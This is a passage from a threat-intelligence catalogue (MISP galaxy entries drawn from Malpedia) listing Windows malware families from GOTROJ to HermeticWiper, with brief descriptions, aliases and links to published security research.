GOTROJ

The tag is: misp-galaxy:malpedia="GOTROJ"

GOTROJ is also known as:

Table 3604. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gotroj

https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf

GovRAT

The tag is: misp-galaxy:malpedia="GovRAT"

GovRAT is also known as:

Table 3605. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat

https://www.yumpu.com/en/document/view/55930175/govrat-v20

Gozi

  • 2000: Ursnif aka Snifula

  • 2006: Gozi v1.0, Gozi CRM, CRM, Papras

  • 2010: Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)

  • → 2010: Gozi Prinimalka → Vawtrak/Neverquest

In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and is often classified as Ursnif aka Snifula.

In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.

The tag is: misp-galaxy:malpedia="Gozi"

Gozi is also known as:

  • CRM

  • Gozi CRM

  • Papras

  • Snifula

  • Ursnif

Table 3606. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.secureworks.com/research/gozi

https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.secureworks.com/research/threat-profiles/gold-swathmore

https://github.com/mlodic/ursnif_beacon_decryptor

https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://securelist.com/financial-cyberthreats-in-2020/101638/

http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html

https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance

https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/

https://lokalhost.pl/gozi_tree.txt

https://www.youtube.com/watch?v=BcFbkjUVc7o

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef

GrabBot

The tag is: misp-galaxy:malpedia="GrabBot"

GrabBot is also known as:

Table 3608. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot

http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data

Grandoreiro

According to ESET Research, Grandoreiro is a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.

The tag is: misp-galaxy:malpedia="Grandoreiro"

Grandoreiro is also known as:

Table 3611. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season

http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853

https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://www.metabaseq.com/grandoreiro-banking-malware-deciphering-the-dga/

https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_study_grandoreiro_analysis_2022_v1.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/

https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

https://www.proofpoint.com/us/blog/threat-insight/copacabana-barcelona-cross-continental-threat-brazilian-banking-malware

https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks

https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf

GrandSteal

The tag is: misp-galaxy:malpedia="GrandSteal"

GrandSteal is also known as:

Table 3612. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grandsteal

http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html

Graphican

According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican’s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.

The tag is: misp-galaxy:malpedia="Graphican"

Graphican is also known as:

Table 3615. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/flea-backdoor-microsoft-graph-apt15

Graphiron

Downloader / information stealer used by UAC-0056, observed since at least October 2022.

The tag is: misp-galaxy:malpedia="Graphiron"

Graphiron is also known as:

Table 3616. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.graphiron

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer

https://www.secureworks.com/research/the-growing-threat-from-infostealers

Graphite

Trellix describes Graphite as a malware using the Microsoft Graph API and OneDrive for C&C. It was found being deployed in-memory only and served as a downloader for Empire.

The tag is: misp-galaxy:malpedia="Graphite"

Graphite is also known as:

Table 3617. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/

https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html

Grateful POS

POS malware targets systems that run physical point-of-sale devices and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. Masked as the LogMeIn software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with a low detection ratio, according to some of the earliest detections displayed on VirusTotal. The first sample was uploaded in November 2017. Additionally, this malware appears to be related to the FrameworkPOS malware, which was linked to some of the high-profile merchant breaches in the past.

The tag is: misp-galaxy:malpedia="Grateful POS"

Grateful POS is also known as:

  • FrameworkPOS

  • SCRAPMINT

  • trinity

Table 3620. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf

http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html

http://www.secureworks.com/research/threat-profiles/gold-franklin

https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/

https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf

Gratem

The tag is: misp-galaxy:malpedia="Gratem"

Gratem is also known as:

Table 3621. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem

GreenShaitan

The tag is: misp-galaxy:malpedia="GreenShaitan"

GreenShaitan is also known as:

  • eoehttp

Table 3624. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan

https://blog.cylance.com/spear-a-threat-actor-resurfaces

GreetingGhoul

The tag is: misp-galaxy:malpedia="GreetingGhoul"

GreetingGhoul is also known as:

Table 3625. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul

https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/

GRILLMARK

This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system’s proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.

The tag is: misp-galaxy:malpedia="GRILLMARK"

GRILLMARK is also known as:

  • Hellsing Backdoor

Table 3627. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark

https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/

https://content.fireeye.com/m-trends/rpt-m-trends-2019

GRIMAGENT

GRIMAGENT is a backdoor that can execute arbitrary commands, download files, create and delete scheduled tasks, and execute programs via scheduled tasks or via the ShellExecute API. The malware persists via a randomly named scheduled task and a registry Run key. The backdoor communicates to hard-coded C&C servers via HTTP requests with portions of its network communications encrypted using both asymmetric and symmetric cryptography. GRIMAGENT was used during some Ryuk Ransomware intrusions in 2020.

The tag is: misp-galaxy:malpedia="GRIMAGENT"

GRIMAGENT is also known as:

Table 3628. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent

https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer

https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets

https://twitter.com/bryceabdo/status/1352359414746009608

https://blog.group-ib.com/grimagent

GrimPlant

This malware was seen during the cyberattacks on Ukrainian state organizations. It is one of two backdoors written in Go that were used in these attacks and attributed to UAC-0056 (SaintBear, UNC2589, TA471).

The tag is: misp-galaxy:malpedia="GrimPlant"

GrimPlant is also known as:

Table 3629. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/

https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/

https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/

https://www.mandiant.com/resources/spear-phish-ukrainian-entities

https://cert.gov.ua/article/38374

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830

https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/

https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine

GROK

The tag is: misp-galaxy:malpedia="GROK"

GROK is also known as:

Table 3630. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grok

https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/

Growtopia

According to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims to have created this software for educational purposes only. This stealer uses the name of a legitimate online game.

The tag is: misp-galaxy:malpedia="Growtopia"

Growtopia is also known as:

Table 3631. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.growtopia

https://github.com/TheC0mpany/GrowtopiaStealer

gsecdump

The tag is: misp-galaxy:malpedia="gsecdump"

gsecdump is also known as:

Table 3633. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump

https://attack.mitre.org/wiki/Technique/T1003

GSpy

A malware family with a DGA.

The tag is: misp-galaxy:malpedia="GSpy"

GSpy is also known as:

Table 3634. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gspy

https://www.virustotal.com/gui/file/0a062a1cbcd05f671f5c3fe5575e29fdd9e13deeb9f34f1ee9ffa6b75835668f/detection

H1N1 Loader

The tag is: misp-galaxy:malpedia="H1N1 Loader"

H1N1 Loader is also known as:

Table 3637. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1

https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities

HackSpy

Py2Exe-based tool, as found on GitHub.

The tag is: misp-galaxy:malpedia="HackSpy"

HackSpy is also known as:

Table 3640. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy

https://github.com/ratty3697/HackSpy-Trojan-Exploit

Hades

According to PCrisk, Hades Locker is an updated version of WildFire Locker ransomware that infiltrates systems and encrypts a variety of data types using AES encryption. Hades Locker appends the names of encrypted files with the ".~HL[5_random_characters] (first 5 characters of encryption password)" extension.

The tag is: misp-galaxy:malpedia="Hades"

Hades is also known as:

Table 3641. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hades

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/

https://www.accenture.com/us-en/blogs/security/ransomware-hades

https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://twitter.com/inversecos/status/1381477874046169089?s=20

https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf

https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure

https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware

http://www.secureworks.com/research/threat-profiles/gold-winter

Hakbit

Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to an FTP server. The ransom note is embedded, in earlier versions as a plain string, then as a base64 string. In some versions, these strings are slightly obfuscated.

Contact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent "KiraLock" has kiraransom@ (among others of course).

The tag is: misp-galaxy:malpedia="Hakbit"

Hakbit is also known as:

  • Thanos Ransomware

Table 3642. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit

https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf

https://unit42.paloaltonetworks.com/thanos-ransomware/

https://securelist.com/cis-ransomware/104452/

https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/

https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html

https://unit42.paloaltonetworks.com/prometheus-ransomware/

https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4

https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/

https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/

https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/

https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/

https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.justice.gov/usao-edny/press-release/file/1505981/download

https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/

https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/

https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware

HALFRIG

A stager used by APT29 to deploy CobaltStrike.

The tag is: misp-galaxy:malpedia="HALFRIG"

HALFRIG is also known as:

Table 3643. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig

https://www.gov.pl/attachment/64193e8d-05e2-4cbf-bb4c-5f58da21fefb

Hancitor

Hancitor (aka Chanitor) emerged in 2013 and spreads via social engineering techniques, mainly through phishing mails embedding a malicious link or a weaponized Microsoft Office document that contains a malicious macro.

The tag is: misp-galaxy:malpedia="Hancitor"

Hancitor is also known as:

  • Chanitor

Table 3645. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor

https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/

https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/

https://malware-traffic-analysis.net/2021/09/29/index.html

https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/

https://blog.group-ib.com/hancitor-cuba-ransomware

https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure

https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb

https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5

https://twitter.com/TheDFIRReport/status/1359669513520873473

https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping

https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader

https://pid4.io/posts/how_to_write_a_hancitor_extractor/

https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/

https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/

https://www.malware-traffic-analysis.net/2021/09/29/index.html

https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/

https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8

https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/

https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon

https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak

https://isc.sans.edu/diary/rss/27618

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/

https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/

https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html

https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity

https://cyber-anubis.github.io/malware%20analysis/hancitor/

https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

https://blog.group-ib.com/prometheus-tds

https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/

https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/

https://muha2xmad.github.io/malware-analysis/fullHancitor/

https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/

https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/

https://blog.group-ib.com/switching-side-jobs

https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/

https://www.uperesia.com/hancitor-packer-demystified

https://muha2xmad.github.io/unpacking/hancitor/

https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html

HappyLocker (HiddenTear?)

The tag is: misp-galaxy:malpedia="HappyLocker (HiddenTear?)"

HappyLocker (HiddenTear?) is also known as:

Table 3646. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker

Havex RAT

Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as "Dragonfly" and "Energetic Bear". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.

Once installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.

Havex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.

The tag is: misp-galaxy:malpedia="Havex RAT"

Havex RAT is also known as:

Table 3651. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat

https://www.f-secure.com/weblog/archives/00002718.html

https://www.secureworks.com/research/threat-profiles/iron-liberty

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.cisa.gov/uscert/ncas/alerts/aa22-083a

https://vblocalhost.com/uploads/VB2021-Slowik.pdf

https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/

HAWKBALL

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

The tag is: misp-galaxy:malpedia="HAWKBALL"

HAWKBALL is also known as:

Table 3653. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball

https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html

HawkEye Keylogger

HawkEye is a keylogger that has been distributed since 2013. Discovered by IBM X-Force, it is currently spread via phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications but, in the last observed versions, new "loader capabilities" have been spotted. It is sold by its development team on dark web markets and hacking forums.

The tag is: misp-galaxy:malpedia="HawkEye Keylogger"

HawkEye Keylogger is also known as:

  • HawkEye

  • HawkEye Reborn

  • Predator Pain

Table 3654. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/

https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/

https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/

https://www.cyberbit.com/hawkeye-malware-keylogging-technique/

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md

http://www.secureworks.com/research/threat-profiles/gold-galleon

https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/

https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/

https://www.secureworks.com/research/threat-profiles/gold-galleon

https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/

https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry

http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html

https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/

https://securelist.com/apt-trends-report-q2-2019/91897/

HDMR

HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: "!!! READ THIS !!!.hta".

The tag is: misp-galaxy:malpedia="HDMR"

HDMR is also known as:

  • GO-SPORT

Table 3656. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr

http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html

https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1

HelloKitty (Windows)

Unit42 states that HelloKitty is a ransomware family that first surfaced at the end of 2020, primarily targeting Windows systems. The malware family got its name from its use of a mutex named HelloKittyMutex. The ransomware samples seem to evolve quickly and frequently, with different versions using the .crypted or .kitty file extension for encrypted files. Some newer samples use a Golang packer that ensures the final ransomware code is only loaded in memory, most likely to evade detection by security solutions.

The tag is: misp-galaxy:malpedia="HelloKitty (Windows)"

HelloKitty (Windows) is also known as:

  • KittyCrypt

Table 3662. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks

https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/

https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html

https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html

https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/

https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/

https://www.speartip.com/resources/fbi-hellokitty-ransomware-adds-ddos-to-extortion-arsenal/

https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/

https://twitter.com/fwosar/status/1359167108727332868

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html

https://www.ic3.gov/Media/News/2021/211029.pdf

Heloag

The tag is: misp-galaxy:malpedia="Heloag"

Heloag is also known as:

Table 3664. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag

https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/

Herbst

The tag is: misp-galaxy:malpedia="Herbst"

Herbst is also known as:

Table 3666. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst

https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware

HermeticWiper

According to SentinelLabs, HermeticWiper is a custom-written application with very few standard functions. It abuses a signed driver called "empntdrv.sys", associated with the legitimate software "EaseUS Partition Master Software", to enumerate the MBR and all partitions of all physical drives connected to the victim's Windows device and to overwrite the first 512 bytes of every MBR and partition it can find, rendering them useless. This malware is associated with the attacks against Ukraine during Russia's invasion in February 2022.

The tag is: misp-galaxy:malpedia="HermeticWiper"

HermeticWiper is also known as:

  • DriveSlayer

  • FoxBlade

  • KillDisk.NCV

  • NEARMISS

Table 3669. Table References

Links

